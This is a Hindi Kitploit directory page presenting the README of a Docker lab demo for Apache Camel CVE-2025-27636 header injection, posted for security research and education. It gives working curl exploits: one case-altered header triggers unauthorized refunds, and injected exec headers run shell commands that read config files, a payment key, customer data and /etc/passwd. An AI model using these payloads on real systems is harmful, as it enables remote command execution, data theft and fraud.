Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-27636-demo — Apache Camel CVE-2025-27636 का प्रदर्शन, Docker-आधारित हेडर इंजेक्शन हमलों के पुनरुत्पादन के साथ, जिसमें बीन मेथड इंजेक्शन और कमांड निष्पादन शामिल है, सुरक्षा अनुसंधान और शिक्षा के लिए। | Kitploit
उपकरण/GitHubGitHub/crystallen1/cve-2025-27636-demo
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षारेड टीमिंग
GitHubcrystallen1/cve-2025-27636-demo

CVE-2025-27636-demo

Apache Camel CVE-2025-27636 का प्रदर्शन, Docker-आधारित हेडर इंजेक्शन हमलों के पुनरुत्पादन के साथ, जिसमें बीन मेथड इंजेक्शन और कमांड निष्पादन शामिल है, सुरक्षा अनुसंधान और शिक्षा के लिए।

रिपॉजिटरी देखें
10 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

Apache Camel CVE प्रदर्शन

यह प्रोजेक्ट Apache Camel में हेडर इंजेक्शन हमलों से संबंधित सुरक्षा कमजोरियों को प्रदर्शित करता है।

Docker बिल्ड

Docker इमेज बनाएं:

root@kitploit:~
docker build -t camel-cve-demo .

Docker रन

सभी आवश्यक पोर्ट के साथ कंटेनर चलाएं:

root@kitploit:~
docker run -d `
  --name camel-cve-demo `
  -p 8080:8080 `
  -p 8081:8081 `
  -p 8484:8484 `
  -v ${PWD}/logs:/app/logs `
  -e JAVA_OPTS="-Xmx512m -Xms256m" `
  camel-cve-demo

हमले का पुनरुत्पादन

1. बीन मेथड इंजेक्शन हमला

मेथड नाम इंजेक्ट करके कमजोर एंडपॉइंट का शोषण करें:

root@kitploit:~
# सफल हमला - केस-सेंसिटिव हेडर
curl.exe -X POST "http://localhost:8081/api/payment/callback" -H "cAmelBeanMethodName: processRefund" -d "order_id=ORD999&amount=9999.99"

# वैकल्पिक - क्वेरी पैरामीटर इंजेक्शन
curl.exe "http://localhost:8081/api/payment/callback?cAmelBeanMethodName=processRefund" -X POST -d "order_id=ORD999&amount=9999.99"

तुलना (ये विफल होने चाहिए):

root@kitploit:~
# गलत केस - काम नहीं करना चाहिए
curl.exe -X POST "http://localhost:8081/api/payment/callback" -H "camelbeanmethodname: processRefund" -d "order_id=ORD999&amount=9999.99"

curl.exe -X POST "http://localhost:8081/api/payment/callback" -H "CamelBeanMethodName: processRefund" -d "order_id=ORD999&amount=9999.99"

2. कमांड निष्पादन हमला

मनमाने कमांड निष्पादित करने के लिए exec कंपोनेंट का शोषण करें:

टोही:

root@kitploit:~
# वर्तमान निर्देशिका जांचें
curl.exe -X POST http://localhost:8484/api/payment/verify-signature -H "cAmelExecCommandExecutable: /bin/sh" -H "cAmelExecCommandArgs: -c pwd"

# कॉन्फ़िग निर्देशिका सूचीबद्ध करें
curl.exe -X POST http://localhost:8484/api/payment/verify-signature -H "cAmelExecCommandExecutable: /bin/sh" -H "cAmelExecCommandArgs: -c ls -la /app/config/"

# कॉन्फ़िगरेशन फ़ाइलें खोजें
curl.exe -X POST http://localhost:8484/api/payment/verify-signature -H "cAmelExecCommandExecutable: /bin/sh" -H "cAmelExecCommandArgs: -c find / -name database.conf 2>/dev/null"

डेटा बहिष्करण:

root@kitploit:~
# डेटाबेस कॉन्फ़िगरेशन पढ़ें
curl.exe -X POST http://localhost:8484/api/payment/verify-signature -H "cAmelExecCommandExecutable: cat" -H "cAmelExecCommandArgs: /etc/app/config/database.conf"

# भुगतान रहस्य पढ़ें
curl.exe -X POST http://localhost:8484/api/payment/verify-signature -H "cAmelExecCommandExecutable: cat" -H "cAmelExecCommandArgs: /app/secrets/payment.key"

# ग्राहक डेटा पढ़ें
curl.exe -X POST http://localhost:8484/api/payment/verify-signature -H "cAmelExecCommandExecutable: cat" -H "cAmelExecCommandArgs:/var/data/customers/customers.csv"

# ऑडिट लॉग पढ़ें
curl.exe -X POST http://localhost:8484/api/payment/verify-signature -H "cAmelExecCommandExecutable: cat" -H "cAmelExecCommandArgs:/var/log/audit/audit.log"

# सिस्टम उपयोगकर्ता पढ़ें
curl.exe -X POST http://localhost:8484/api/payment/verify-signature -H "cAmelExecCommandExecutable: cat" -H "cAmelExecCommandArgs:/etc/passwd"

# प्रक्रियाएं सूचीबद्ध करें
curl.exe -X POST http://localhost:8484/api/payment/verify-signature -H "cAmelExecCommandExecutable: ps" -H "cAmelExecCommandArgs:aux"

हमले के परिणाम सत्यापित करें

कंटेनर के अंदर हमले के लॉग जांचें:

root@kitploit:~

# अनधिकृत रिफंड प्रयास देखें
docker exec camel-cve-demo cat /tmp/unauthorized_refund.txt

पोर्ट

  • 8080: मुख्य एप्लिकेशन (फ्रंटएंड)
  • 8081: बीन इंजेक्शन कमजोर एंडपॉइंट
  • 8484: Exec इंजेक्शन कमजोर एंडपॉइंट
टूल डाउनलोड करें